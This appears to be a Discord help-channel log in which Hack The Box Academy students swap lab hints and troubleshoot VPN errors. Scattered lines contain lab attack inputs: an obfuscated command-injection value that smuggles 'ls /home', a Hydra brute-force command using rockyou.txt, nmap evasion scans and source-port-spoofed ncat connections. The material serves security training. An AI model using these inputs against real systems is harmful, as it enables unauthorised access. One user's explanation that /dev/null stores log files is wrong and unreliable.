there should only be one for this exercise, right.

#

OMG so overthinking it. Thanks Insp

soft grotto
#

mind if I DM?

proper meadow
#

I got it

soft grotto
#

lol

#

you got it

#

hahaha

proper meadow
#

I'm gonna go dance for a minute

soft grotto
#

I did the exact same thing

#

well, not the dancing part

#

Anyone able to give me a hint?

On Getting Started Module
At last question: escalating to root after getting a foothold.

I've gotten a shell, no problem and can load tools, files, etc. I've tried using the exploit that linpeas calls out, I've tried uploading php scripts for shells to the site to no avail.

Am I over complicating things?

jagged zenith
#

We need modules blueTeam, like spunk, snoopy

drifting knoll
jagged zenith
jagged zenith
soft grotto
hot oracle
#

Hi

#

Would like to ask

#

We must use pwn box for academy?

#

Can we use openvpn something like that?

drifting knoll
hot oracle
#

Cool

#

Let me try

#

😊

hollow flame
#

i cant connect to the academy vpn key for some reason

#
ef:2::1,ifconfig 10.10.14.115 255.255.254.0,peer-id 42,cipher AES-256-GCM'                                            │
2021-09-23 09:14:30 OPTIONS IMPORT: timers and/or timeouts modified                                                   │
2021-09-23 09:14:30 OPTIONS IMPORT: --ifconfig/up options modified                                                    │
2021-09-23 09:14:30 OPTIONS IMPORT: route options modified                                                            │
2021-09-23 09:14:30 OPTIONS IMPORT: route-related options modified                                                    │
2021-09-23 09:14:30 OPTIONS IMPORT: peer-id set                                                                       │
2021-09-23 09:14:30 OPTIONS IMPORT: adjusting link_mtu to 1625                                                        │
2021-09-23 09:14:30 OPTIONS IMPORT: data channel crypto options modified                                              │
2021-09-23 09:14:30 Data Channel: using negotiated cipher 'AES-256-GCM'                                               │
2021-09-23 09:14:30 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key                          │
2021-09-23 09:14:30 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key                          │
2021-09-23 09:14:30 net_route_v4_best_gw query: dst 0.0.0.0                                                           │
2021-09-23 09:14:30 net_route_v4_best_gw result: via 192.168.1.1 dev enp4s0                                           │
2021-09-23 09:14:30 ROUTE_GATEWAY 192.168.1.1/255.255.255.0 IFACE=enp4s0 HWADDR=d4:5d:64:ab:eb:8f                     │
2021-09-23 09:14:30 GDG6: remote_host_ipv6=n/a                                                                        │
2021-09-23 09:14:30 net_route_v6_best_gw query: dst ::                                                                │
2021-09-23 09:14:30 sitnl_send: rtnl: generic error (-101): Network is unreachable                                    │
2021-09-23 09:14:30 ROUTE6: default_gateway=UNDEF                                                                     │
2021-09-23 09:14:30 ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such device (errno=19)                            │
2021-09-23 09:14:30 Exiting due to fatal error       
#

this is what happens

#

i downloaded a new one too

#

still not working

#

actually the starting point vpn also doesnt work :C

#

the tryhackme vpn also doesnt work

#

ill use the pwnbox for now but if someone knows the problem please tell

rustic sage
#

Is your openvpn installed correctly?

hollow flame
hollow flame
#

then i sudo pacman -S openvpn

#

which reinstalled

#

still same errorr

#

every ovpn key is giving this

#

yeah i have network configuration manager

rustic sage
#

As you see the reason for the error is that there is no /dev/net/tut, so make sure you have the correct path to the .ovpn file

hollow flame
#

huh wdym

#

i did the same thing yesterday it was working just fine

rustic sage
#
2021-09-23 09:14:30 ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such device (errno=19)                            │
2021-09-23 09:14:30 Exiting due to fatal error 
hollow flame
#

yeah i see that

#

im in this directory

#

where i have academy.ovpn

#

now i do sudo openvpn academy.ovpn?

rustic sage
#

This should also need to work
sudo openvpn --config academy.ovpn

hollow flame
#

same error

rustic sage
#

It might not work but you could also use your network manager to connect to openvpn

#

For arch you also need networkmanager-openvpn installed

mild mica
#

can someone help me on the assembly language module? i just have a question

ionic bloom
#

Hi, sorry but after 4 hours of failures, I'm going to ask help again
Module: broken authentication - bruteforcing cookies
Question: Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?

So I managed to decode and encode the cookie as role:admin and got a 'successfull' response. But not successfull enough, as it seems :/
I've tried a lot of combinations with user and role, but nothing seems to work.
I've also tried to bruteforce the 'time' param in the decoded cookie but nothing. Can somebody help me please?

ionic bloom
#

I solved the second question and the 'super user' role is actually 'admin'.. so maybe there is an error in the module?

#

tried with admin and htbadmin aswell..

hollow flame
#

bruh

#

16 hours

#

for this ||nmap -p- 10.129.117.1 -oA target||

#

and this is the question

#

Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer.

#

i suppose im executing with correct arguments

bright drift
hollow flame
west rampart
#

@ionic bloom I can ask if there's a way how to enumerate it 🙂

ionic bloom
#

you would need a wordlist of roles..

west rampart
#

Awesome 🙂

ionic bloom
#

an Hint like: You'll need to enumerate the roles would have been really usefull 😛

west rampart
#

either fuzzing it or reading the question carefully 😄

#

i just deleted your wordlist to prevent spoilers 🙂

ionic bloom
#

sorry

west rampart
#

No worries. if you want to discuss more, please reach out to me

young zodiac
#

has any1 truly hacked wifi?

lean flax
#

hey! hello to everyone

#

i'm stuck in the web application module

#

in this question

#

If you wanted to inject a malicious link to "www.malicious.com", and have the clickable text read 'Click Me', what's the HTML code you would use?

#

i've tried the <a> tags, the <button> tags, in every combination possible

#

obviously I'm not expecting the answer, I just need to speak with someone because I think something really simple is missing for me

#

thank you!

glad orbit
#

Has anyone found the solution for the module using web proxies, question about the 31 characters long?

lean flax
#

I solved it already, thanksssss

glad orbit
#

Suggestion?

rare moth
#

i tried to connect my kali linux to the VPN

#

but it keeps giving me error

#

i would like some help with that

#

DM me pls

hollow flame
zealous bison
#

Hi, I´m trying to answer this question from the Learning Process course, does anybody knows the answer?

rustic sage
#

Subtract the numbers form eachother

zealous bison
plucky nimbus
#

Can anyone help me/give me a hint on which sub-domain i should go after
Its the Attacking Web Applications with Ffuf module

fervent girder
#

Hii guyz

#

I am new to cybersecurity

#

But i want tp learn it desperately

#

Can you guyz guide me where to start please?

sterile hawk
#

++academy

red obsidianBOT
plucky nimbus
# tight glen read about http-statuscodes

Thats not my problem. problem is there are 3 different sub-domains and 3 different file extensions, meaning i have to run a lot of scans, but as we speak i just got it xD

tight glen
#

Okay nice

#

but u learned about recursive scanning, right?

#

so technically u just need 3 scans

plucky nimbus
#

Yeah, 1 scan doing a normal directory scan running recursively and 3 more for the 3 different extensions

ionic bloom
#

Has someone done Skill Assessment - Broken Authentication? I'm stuck at the end.. tried every possible role with every possible user I've enumerated.. but nothing

hollow oyster
#

Hey, any1 there who could help me out with the last question on Active Directory LDAP

 What non-default privilege does the htb-student user have?

Not sure what i am looking for, at least not for userAcountControl or User's domain privileges ...

icy snow
hollow oyster
# icy snow I haven’t figured this one out either

Dear @blissful verge may i ask you to shed some light what this question is about? Apparently it's not about userAcountControl or User's domain privileges... not sure where to look as nothing stands out 🤨

rare moth
#

like redownloading the VPN package?

hollow flame
#

worked for me

rare moth
#

ohhh

#

i closed my kali linux VM then reopened it

#

and redownloaded the package multiple times

#

on different days

#

still no work idk why

#

it worked one day that was the first time i did it then it's like nope

#

i no work anymore

#

😭

glad orbit
#

Academy - Cracking Passwords with Hashcat. Somebody have solved the first question?

limber gust
#

arkadaslar aranizda CCNA hazirlasan ve ya CCNA kazanan varmi?

flat onyx
#

has anyonew completed INTRODUCTION TO PYTHON 3

west rampart
flat onyx
#

What was the answer to what is the 3rd most word on the exercise target window

#

I think i have to figure it out using the requests module

west rampart
#

no the answer is inside the exercise

rare moth
#

can someone DM me on how to connect to the HTB server and all that

regal ore
#

Dumbar10 did you ever find out the answer and what module are you in?

sick crescent
#

tipsfedora 💩 box_ropetwo box_time 😶

torpid ermine
#

anyone please give me an nudge in active directory powerview module skill assessment quetion

stoic vessel
#

can anyone tell me what i am doing wrong

stoic vessel
#

😆

main vapor
#

Is anyone experiencing the same situation in the "Stack-Based Buffer Overflows on Windows x86" Module?
If you faced it DM me or see the module page again.

signal summit
#

Network Enumeration with Nmap -> Host and Port Scanning -> Filtered Ports
I don't really get the purpose behind showing us the packet-trace for dropped and rejected packets.
Is it to show us how to differentiate filtered states ? The first scan is showing us how the packet trace looks like if we have 2 syn packets; the firewall is dropping the packets. The second one is a SYN and an ICMP (type=3/code=3) response. That strongly suggest the firewall is rejecting the packets. At the end you are saying we'll have to take a look at it later. Does that mean we can ignore filtered state if the packets are dropped but we should investigate further if the packets are rejected?

wind gust
#

why is ZAP not installed by default in that parrot provided by HTB

novel matrix
#

Because

midnight sparrow
#

Why the modules are scattered like this?
Why you don't put them under their relative path?

urban sage
#

The coming soon modules? They aren't released yet so not in their final state.

keen jay
#

Hello everyone, I am trying to complete "Bypassing Other Blacklisted Characters" in the Command Injections module. But I am kinda stuck. I have tried many ways to run the command "ls /home" using envirnment variables but I can't seem to get the name of the user. Here are one of the commands I've tried:
127.0.0.1${LS_COLORS:10:1}${IFS}${LS_COLORS:14:1}${LS_COLORS:1:1}${IFS}${PATH:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}

This is supposed to be: 127.0.0.1; ls /home

I am not getting "invalid input" but a blank result.

#

The question for that module is:
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?

dusky swift
#

dude im so lost im doing the intro to network traffic analysis right now, which im pretty comfortable with

#

this one quesiton just wont go though

#

it's what protocol is used at the link layer of tcp

#

which is mac, that or arp

#

neither of which are an accepted answer

#

am i just being stupid or is the answer off

#

for anyone else with this issue, it's mac-address

#

just got it

keen jay
#

ugh

#

dude, I love HTB Academy, but TBH sometimes the questions I feel like aren't worded correctly

dusky swift
#

oh absolutely

#

and like i was just doing

keen jay
#

and then the answer has be written a specific way

dusky swift
#

the answer to this question was obviously fucking mac

#

but it had a dash and had to be mac-address, which was inconsistent with the other answers being things like "ipv4"

keen jay
dusky swift
#

couldn't help you on that one, your guess is the best i would be able to do too

keen jay
#

thanks no worries

#

I noticed that sometimes if I don't get the answer, I'll just skip to a different section and come back later

#

I'm trying to complete all the modules for the Bug Bounty Hunter cert

dusky swift
#

nobody really answers this channel unfortunately

keen jay
#

yeah that sucks

#

THM is super active

#

and any issues you have mostly have writeups about them

dusky swift
#

should i try that out as well

keen jay
#

oh definitely

dusky swift
#

im trying to get a good toolkit pretty fast

#

yeah ok ill check it out

#

a lot of htb has writeups as well

keen jay
#

the reason I'm on HTB Academy is coz I exhausted majority of the modules at THM lolol

#

I learned a ton already from there and currently planning to take the Comptia Pentest+ exam in a couple months

dusky swift
#

sometimes i hate htb because every time i feel smart for about thirty seconds it shames me with a new tool

keen jay
#

I wanna say ALL of the platforms are good: HTB, THM, INE and Pentester Labs

#

I went through alot of the courses and they all offer different approaches to certain problems/exploits/attacks

dusky swift
#

do you have a favorite or no

mortal basin
#

@keen jay check DM

keen jay
# dusky swift do you have a favorite or no

I don't think I have a favorite. They are all good TBH. I forgot to mention Udemy is good too. I'd say do all of them. The only one I didn't like was Cybrary, because they don't allow you to VPN into their machines and use your own tools.

#

Also Codecademy is good, so you can learn to read/write exploits.

novel matrix
#

read and write exploits has nothing to do with codecademy

keen jay
#

sorry

novel matrix
#

it's a learning platform to learn how to code a particular language.

keen jay
#

meant to clarify, codecademy teaches you to code

novel matrix
#

Yeah

plucky condor
#

ples add a cross site scripting module in Academy i needs it

lavish junco
#

lucky you I guess

hollow flame
#

||libnsock mksock_bind_addr(): Bind to 0.0.0.0:53 failed (IOD #1): Address already in use|| getting this when doing network enumeration with nmap medium labs

#

||sudo ncat -nv --source-port 53 10.129.2.48 53|| command that im executign

#

there is no ncat in the pwnbox?

hollow flame
oak lagoon
#

Why does the box in the Getting Started Knowledge Check keep disconnecting? Every other minute its getting unresponsive for some time, incredibly annoying!

hollow flame
#

ok so i got access to the ||proftpd server running on port 21 via ncat|| module is network enumeration with nmap firewall evasionmedium labs

#

now what?

#

nvm we have to run scripts

hollow flame
#

so i reached the last lab in network enum with nmap

#

i tried both of these service versions they are not the correct answer that is the output of ||nmap -sV 10.129.158.74|| btw

hollow flame
#

i connected to both of the services using ||ncat -nv --source-port 53 ip 80/22||

#

in ssh i get broken pipe thing

#

and in http i get

#

oh

#

wait but there are only 2 running?

#

how do i get some info on filtered

#

hm

#

ok

#

ah ok

#

i do remember doing a -p- probably thought i did it cuz i started doing this one right after the medium lab

hollow flame
#

still nothing in full scan

#

and it is a hard lab question only

#

scanned on pwnbox too

#

same thing

#

doingh

#

says this

#

-p- -sA

#

ikr

#

thats why i remember doing a full scan and only seeing ssh and http

#

im gonna try regenerating target

#

omg ok

#

ugh

#

this one will take sometime

#

nvm

#

omg

#

i got

#

a port called

#

tcpwrapped

#

oh

#

dafuq

#

it timed out

#

||sudo ncat -nv --source-port 53 10.129.14.185 50000||

#

after doing this

#

didnt even say connection successful

#

sheesh

#

whats up with this module

#

can u connect to the academy vpn and scan sudo nmap 10.129.14.185 -p- -sS

#

do you get all the ports?

#

sure

#

ok now when i did -p50000 i got the running service name

#

but connecintG :C

#

nope

#

i just cross checked the ndcat command with the one in evasion section

#

its exactly the same except ip

#

still

#

it says address already in use

#

same happening in pwnbox

opal kraken
young sleet
#

what's the issue !

#

Dm me

unreal crescent
#

Anyone else having issues on ZAP Scanner section of Using Web Proxies? ZAP doesn't seem to find a High Alert

solid prairie
#

Hi, are there any Win32 assembly/reversing tracks?

hollow flame
#

brrruh

#

i've deleted and downloadewd the vpn multiple times

#

restarted my computer

#

but still

#

it doesnt connect

#

it was connecting yesterday

#

plis help

#

i even bought student sub

polar pond
#

hey everyone! i'm working through the hashcat academy module and i'm super stuck on the "cracking common hashes" section, would very much appreciate a push!

weary oyster
# hollow flame it doesnt connect

My VPN isn't working either. It worked fine the last few day but nothing I do this morning is getting it to connect. I tried downloading it again and nothing. Are you also getting a "TLS Error"?

hollow flame
# weary oyster My VPN isn't working either. It worked fine the last few day but nothing I do th...

yep

2021-09-27 16:18:08 VERIFY KU OK
2021-09-27 16:18:08 Validating certificate extended key usage
2021-09-27 16:18:08 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2021-09-27 16:18:08 VERIFY EKU OK
2021-09-27 16:18:08 VERIFY OK: depth=0, C=UK, ST=City, L=London, O=HackTheBox, CN=htb, name=htb, emailAddress=info@hackthebox.eu``` tis happens and then after sometime the handshake fails and keeps looping
weary oyster
#

Same as me. Hmm... Maybe it's something on their end?

hollow flame
#

probably

weary oyster
#

I'm able to connect to my other HTB VPN just fine.

hollow flame
#

oh yeah didnt try that

polar pond
hollow flame
#

sheesh the other one is exiting for me

polar pond
#

oh, sucks then=(

rustic rain
plucky condor
graceful rain
#

my vpn isn't working either

weary oyster
#

Yeah, I'm still having issues with mine.

graceful rain
#

it sucks i was trying something in a win 10 vm (im in stack-based buffer overflow on windows x86) and i was just about to succeed and then i got kicked out of the vm

#

because of the vpn connection

#

im in Skills Assessment

#

almost done

weary oyster
#

You were connected and then got kicked off? That does suck...

graceful rain
#

yes it really does

mighty rivet
#

So the silver annual subscription effectively locks you out of buying a cube subscription for a year, which you need to do any of the tier 3 and tier 4 modules. Currently you can either
a) Make a second account and get the Tier-3 and Tier-4 modules there at the reduced rate
b) Pay 40% more to buy cubes on the silver annual subscription.

Is this planned to change anytime soon?

mortal basin
mighty rivet
#

@mortal basin With the monthly subscription you can wait while you are busy with work/certificates and the module you are currently doing or save your cubes for a while.

The module progress for the exam is unaffected though, no? The account with the silver annual can do all of those modules already within the subscription.

mortal basin
# mighty rivet <@!688785320019230730> With the monthly subscription you can wait while you are ...

Yes, but I would recommend having all of your progress under a single account, which is better for the long run.

If you check the note on the annual subscription you'll see that it saves hundreds of dollars, so in either case you'll be saving even if you buy other modules with cubes at the original rate.

Also, as it unlocks all tier 0/1/2 modules, and as we are releasing more modules frequently, you'll be getting more of you money's worth without having to pay anything extra, as all new modules from these tiers would be free "which are the majority of modules if you check the coming soon modules in the job role path".

polar pond
#

hi all, could still very much use some help with the hashcat module if anyone's around!

mighty rivet
#

@mortal basin I would prefer to have it all in one account as well. It's just unsatisfactory to be locked out of a saving opportunity either way. Thanks for understanding and responding to my input

vale thistle
#

Hey! I'm having trouble with the Skill assessment of Web fuzzing.

Not getting any results when fuzzing for subdomains. If i go to the site using browser i get an SSL error.
"Error code: SSL_ERROR_RX_RECORD_TOO_LONG". Is there a problem with the machines or might i just be stopid?

bright drift
#

dm 🙂

surreal rain
polar pond
#

just wondering, hashcat module mentions "wireless attacks module in HTB Academy" few times but i cant seem to find it, is it just me being blind or is it still in the works?

surreal rain
#

Please remember to follow the server rules and ask before DMing users.

mortal nova
#

Has anyone here worked on the Web Requests module? I’m in the POST section, but I have no idea what is supposed to go into the submission box. I think I have the exploit working but I don’t know if it is supposed to give away a flag. The section doesn’t prompt for a specific kind of answer

bright drift
hollow oyster
#

Hey, any1 there who could help me out with the last question on Active Directory LDAP
What non-default privilege does the htb-student user have?

Not sure what i am looking for, at least not for userAcountControl or User's domain privileges ...

high zinc
weary oyster
#

Is anyone able to connect to the academy vpn? I haven't been able to connect since yesterday. I just keep getting TLS Errors. I've tried redownloading the .ovpn file several times and restarted the VM a few time. No luck.

brave palm
#

sup peeps I freaking need HELP with the COMMAND INJECTIONS skill assessments, can't find the vulnerable parameters and that 'Advanced Search' thing idk why it doesn't work

strong sluice
#

wsp

weary oyster
# young sleet same

I reached out to Hack The Box Support on the website and they gave me a new file to try and it worked! Maybe reach out to them and see if they can help you, too.

mortal nova
mellow ingot
#

Hey, I m stuck in the module Login Brute Forcing in the chapter Skills Assessment - service login I don't understand how to get the information about the employee for the first question

eager kite
#

Hello everyone! Who I can dm about module Wordpress hacking? I stuck on question: "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.". Any hints please

bold musk
#

COuld I ask someone about the Web Requets module the POST Method part in particular

high zinc
bold musk
#

yes

#

not sure what I'm supposed to input or if it's bugged or something

high zinc
#

Otherwise I posted some hints for this one previously in this channel that you can search for

#

It's a little tricky

mint karma
#

hey guys

#

for the getting started module

#

knowledge check part

high zinc
eager kite
#

Actually no

#

May be I missed something. I have one theory. Will check it

#

Solved.. Damn it! So easy!

high zinc
#

😅

rustic sage
#

is it theoretically possible for an ipv6 address to be ::?

mint karma
#

:: in an ipv6 address would simply represent 16 zeros

#

so yes

#

its possible

rustic sage
#

lmfao, imagine that

#

"my ip address is ::"

#

even shorter than ipv4 😄

mint karma
#

I mean you can have it as a part of an ipv6 address

#

but having just :: would make it only 64 bits

#

so it would be invalid

#

since you need 128 bits for an ipv6 address

#

anybody done knowledge check part in getting started module

rustic sage
high zinc
#

It would probably just be loopback like 0.0.0.0 is

#

Sorry not loopback - wrong word

#

https://en.m.wikipedia.org/wiki/0.0.0.0 yeah it's the same for IPv6

In the Internet Protocol Version 4, the address 0.0.0.0 is a non-routable meta-address used to designate an invalid, unknown or non-applicable target. This address is assigned specific meanings in a number of contexts, such as on clients or on servers.

foggy temple
#

Hey! Having some trouble getting any signs of response from a target in the "Getting Started" module, I might have to ask for help, but first of all:
Does academy targets need to be accessed from the "My Workstation" instance or pwnBox? Cus I'm trying to do it from my own kali VM instead. Even tried connecting to HTB VPN without any change.

foggy temple
rustic sage
foggy temple
#

Yeah I got it working, but for some reason I got no response of the URL on any tools while connected to the htb VPN. Turned off the VPN and it started working. URL wasn't on the HTB vpn subnet so probably had no reason to VPN from the get-go, but not sure why I didn't get a response before I VPN'd.

rustic sage
#

Need help here! I'm on Network Enumeration with Nmap Hard Lab, and I found the hidden port 50000. But whenever I try to connect with netcat, it refuses, saying the address is already in use. I googled it and have no idea still. Can somebody help?

#

I've checked with netstat and not showing any PID to kill. (I'm trying to connect with 50000 using source port 53)

mint sable
#

Hey citrus, I'm actually on the exact same issue for past hour...

rustic sage
#

good to know I'm not the only one stuck here lol

obtuse terrace
rustic sage
obtuse terrace
rustic sage
obtuse terrace
jagged zenith
#

What is this "Beta Tester Invite"

high zinc
graceful rain
#

my vpn is again not working

short vale
#

I have a question about the ffuf module

#

On the skill assessment part, I don't find the file with "You don't have access" content EDIT: Found it

rustic sage
#

Hello guys , i am new to hackthebox...
basically i have just completed a my course (module) of the Linux Fundamentals , i have 40 cubes.. i want a advice if someone can suggest me which module should i purchase next within 40 cubes , and as a new as well , i would appreciate if someone suggests.

sleek hull
#

Hi everyone! I am working on the basic toolset module of HTB academy and I had a question on the firewall evasion IDS/IPS easy lab. I tried running commands that use the -S or -D options
sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0
or
sudo nmap 10.129.2.28 -n -Pn -p 445 -O -D RND:5
and I either got the tcp/ip fingerprint or a message saying that there were No exact OS matches for host. Eventually I tried using ICMP echo requests -PE and got a ttl of 63 so I entered linux as my answer, yet it was incorrect. I am wondering if someone has found a way to do it using decoys or the -S command. I would really appreciate some help.

obtuse terrace
foggy temple
safe yoke
#

Hi, I need a hint on Broken Authentication module, Page 12, Question 1. I know how to manipulate the cookie, but no matter what I try, the web app says that role does not have any flag. I've tried with: admin, administrator, htbadmin, superuser, super user, root. I've tried all these roles with users "htbuser" and "htbadmin", but no luck. Any ideas?

umbral marsh
#

Yeah I did recently

#

I found a solution lemme see if I can find it again

safe yoke
woeful oxide
#

I’m having some trouble completing the web requests module

#

When I spawn my workstation and try to follow the steps, the steps doesn’t match what I’m experiencing in the VM, foxyproxy doesn’t have a burp option, when I try to do it manually in burp all I get are some errors

#

Someone else experienced this?

unreal crescent
unreal crescent
#

Ok guys, should I just give up on ZAP in the Using Web Proxies module? It says to use the High Alert to get the flag, but ZAP is not finding a High Alert no matter how many time I run it, or change settings ** Update ** It turns out my spawned target was not correct. Once I spawned a fresh target I got the vuln

celest basin
#

I am taking the "USING WEB PROXIES" module and I want to use ZAP, but I can't find it in the pwnbox instance. Anyone knows why?

prisma knoll
#

Hi quick question, I have an issue with XSS module phishing section, i managed to get the flag but when I injected XSS on the first page http://targetIP/phishing the imageURL stayed on the page (can't send screenshot sadly x) )
I used document.getElementById('urlform').remove(); as shown in the course but it kept staying on the page dunno if its section error or me that missed something?
here's the code of the element I tried removing

                <input type="text" placeholder="Image URL" name="url">
            </form>```
patent basin
patent basin
#

also no "GET VPN Key" for cozy experience

rare zinc
#

Did you find any solution? i am facing the same issue

#

Okay, Thanks😃

graceful rain
#

same vpn problem

rustic sage
patent basin
# rustic sage ^

support said to install zap manually before they update pwnthingie

woeful oxide
brazen saffron
#

I can't on the website but on my VM I can ?

safe yoke
#

Hi, Has anyone completed the Broken Authentication module?

brazen saffron
#

Someone can say to me because I don't know what is it and I can't see...

oak summit
#

any help on TCPdump modules

#

Were absolute or relative sequence numbers used during the capture? (see question-1.zip to answer)

knotty ginkgo
high zinc
oak summit
#

Thats what i did understand

urban sage
woeful oxide
#

Is possible to access the targets with my own Kali?

high zinc
brazen saffron
#

I have a kali linux personnaly.

urban sage
#

That should be fine.

brazen saffron
#

But how can I set up a VM for HTB ?

patent basin
#
  1. start kali 2) get the academy vpn key 3) openvpn keyname
brazen saffron
#

For the question HTN Academy.

woeful oxide
high zinc
#

I don't rememebr where to get the VPN file for the Academy - it should be on the platform somewhere (like in your settings or when you want to spawn a target)

#

but when you get it, just type sudo openvpn yourvpnfilehere.ovpn in a terminal

#

then you should be ready to roll

oak summit
patent basin
high zinc
# oak summit ?

what's the exact name of the module and which section is it?

brazen saffron
oak summit
#

Q number 2

high zinc
#

the answer is in lowercase

brazen saffron
brazen saffron
oak summit
brazen saffron
high zinc
brazen saffron
#

Ah ok.

high zinc
brazen saffron
#

But look my screen.

high zinc
#

only a part of it is the answer

#

try figuring out what -a prints and what you need

brazen saffron
#

Yeah but with me it was parrot on the VM in HTB Academy, and in Kali is so what ?

#

It is kali so no ?

#

For me it is that.

high zinc
#

I think you have to remote to the target machine first

oak summit
high zinc
#

ssh with student-blabla 😄

#

@oak summit can you DM me what you're tryign to type in?

brazen saffron
high zinc
#

I don't remember 100%

brazen saffron
high zinc
#

ah, sorry I think I misunderstood what you meant then 😅

brazen saffron
#

No but you see it :

#

When I was on the HTB's VM the answer was parrot and with my VM it what ?

high zinc
#

yeah so uname -a tells you information about the OS and kernel of the machine

#

so if you run it on Kali it'll be different than running it on Parrot

brazen saffron
#

Yeah so for me the answer would have been kali.

#

No ?

high zinc
#

yeah I guess

valid oxide
#

hey peeps

#

Im stuck on the sqlmap assessment

#

I cant find an attack vector, can anyone help me out?

valid oxide
#

i wish the rest of the sqlmap course covered searching a website for attack vectors, I'm feeling very unprepared for the assessment

sudden summit
#

@valid oxide It does prepare you but you gotto look and test each field on the website. Comb through each page and input and maybe use a web proxy to ensure you are not missing anything and can see everything being sent in the data fields.

#

and header fields

drifting harness
#

Can any one help or just tell me what should I do to find the path to a user's mail?

drifting harness
main vapor
#

@drifting harness Do you love having a friendly environment around where you live?

drifting harness
#

Can anyone explain to me why /dev/null always remain empty? I mean how? What is the functionality?

main vapor
# drifting harness Can anyone explain to me why /dev/null always remain empty? I mean how? What is ...

Temporary files that are only needed during a program is running typically will be stored there and disappear when you reboot the system (or any other similar files). Because there is no need for such files to remain permanent on the system, they are put there. For example think of a log file for a program's functionality that does not benefit the regular/normal user very much, the log files will be generated and put in /dev/null and if you want you can have a look at them, however, they dont serve a big purpose to your use, thus they will be deleted on reboot. (This is as far as I understand, if I am wrong anyone correct me.)

#

Think of it as an auto-delete trash bin.

drifting harness
#

I understand this and thank you for elaboration but what you just said about deletion upon reboot doesn't seem to be right

main vapor
#

Why

drifting harness
#

I just redirected this
find / -name "*.conf" 2>/dev/null

#

And then when I checked the /dev/null by cat, it was empty

#

Even tho I hadn't rebooted

main vapor
#

Ooh I think I also forgot about that

#
#

never mind

#

its what you said

drifting harness
#

There may be some continuous flushing of data from /dev/null I think, for which a seperate process may be there

main vapor
#

they will be deleted once written to there

drifting harness
drifting harness
#

What is the code?

#

We might need to call Linus here to ask what he did

#

Lol

main vapor
#

No, no need. For the why/how part, check out this book "How Linux Works, 3rd Edition: What Every Superuser Should Know".

drifting harness
main vapor
#

Its a book you can buy.

drifting harness
#

Oooh a whole book on this!

#

Cool, thanks again

#

Still I would request everyone that If they know answer to my query pls reply fast and save me from reading a whole book

winged roost
#

hi, I was wondering if someone can help me on the following question (it is the the Using web proxies section) - Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?

quartz hollow
#

hi, I'm working on the Firewall and IDS/IPS Evasion Hard lab.
I managed to find port 50,000 but I cant find the version of the service.
can anyone give me a hint as to how to proceed?

drifting harness
#

While I am in the Linux Fundamentals Module , In the Workflow section, Under The Filter Content heading, I find these contents very hard. Can anyone pls suggest me some practice questions, videos or anything so that I can get a good grasp at this??? PLEASE

main stirrup
#

HELLO TO EVERYONE

brazen saffron
#

I'm on Burp but I have not "Raw" :

#

Nvm I found why 🙂 !

high zinc
brazen saffron
#

Who can help me ?

drifting knoll
brazen saffron
drifting knoll
#

your screenshot contained a solution of a question

brazen saffron
#

Ah sorry.

#

And I'm sutpid I found on my Burd but it was on the section :/.

polar pond
#

hey all! would anyone be down to help me with broken authentication module? really banging my head against the wall here

#

not even joking tbh

safe yoke
polar pond
#

i've tried literally EVERYTHING i could think of, tried every wordlist, made my on lists, almost recoded bloody hydra just for that exercise from scratch, tried to follow up on every single cryptic comment like "the server only trusts itself", but still nothing hahaha

#

i'm literally that close to start trying "hack" the page without using broken auth hahahaah

candid swan
#

Hey, so I'm probably an idiot for not figuring this out. Under the Cracking Miscellaneous Files & Hashes section of Cracking passwords with Hashcat - the question is asking to extract the hash from the attached 7-zip file. How do I get said zip onto the pwnbox to be able to extract the hash?

icy snow
#

Is anyone having issues with the VPN key on academy?

rustic sage
#

It is working fine for me.

polar pond
icy snow
rustic sage
#

Are you using pwnbox or a vm?

icy snow
#

VM

icy snow
rustic sage
# icy snow

What happens if you run this?

sudo openvpn --config <path>/academy.ovpn

rustic sage
#

You could try using kali's network manager to connect to OpenVPN

sage jackal
#

Can someone help me with the commands injection skills assessment?

main vapor
#

If anyone finds the Hydra syntax used in the 'Login Brute Forcing' module not user-friendly, you can always opt for this one (for example, you can use this for other services also, for example ssh://IP:PORT):

hydra -l admin -P /usr/share/wordlists/rockyou.txt "http-post-form://139.59.183.98:31817/login.php:username=^USER^&password=^PASS^:F=<form name='login'" -t 64
winged roost
#

hi on the instances there does not seem to ZAP installed, only burp, yet the tasks call for ZAP, can you advise please (the web module in academy)

valid oxide
# sudden summit <@!785541918834556949> It does prepare you but you gotto look and test each fiel...

My confusion is this: in the course we always attacked web addresses with a .php , in the assessment I'm only seeing HTML so far. Does it have to be .php to do sql injection? You see I'm confused by the way the course walked us through with the targets in plain sight. It would have been better to learn how to dig through a website at the same time as learning how certain .php files were vulnerable to injection.

valid oxide
#

@winged roost can you install it?

lethal wind
#

Login brute forcing. Hi folks. I’m totally stuck in this question Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside? Tried the b.gates user an original username list. Checked the hydra params. Also used the rock you.txt for the passwords Any tips?

high zinc
#

Classics are PHP and ASP

#

(Or aspx)

#

You only see HTML pages, ok but is there a search field? A login form? Buttons?

#

If so, what do they point to?

prisma knoll
worldly sand
prisma knoll
#

Yeah so i guess module problem probs cuz i tried several ways to remove none of them working

worldly sand
#

yeah i also think so

#

i tried for an hour lol

prisma knoll
#

Damn😂

#

Plus the html code is exactly the same as in the course and it doesn't work so not logic🤔

worldly sand
#

i thought it was a problem with the xss payload i chose to use

#

but then i tried every variation lol

#

so i figured it wasnt me

prisma knoll
#

Yeah was thinking the same till all the rest of the payload was working😂

worldly sand
#

u need to add not just a ' but a '>

prisma knoll
#

Oh really?

worldly sand
#

at the start

prisma knoll
#

Whut😂

worldly sand
#

yep

prisma knoll
#

Okok will try out

valid oxide
high zinc
#

did you notice the Cheatsheet by the way?

#

It might be helpful

#

oh and did you do the "Introduction to Web Applications" as well?

valid oxide
#

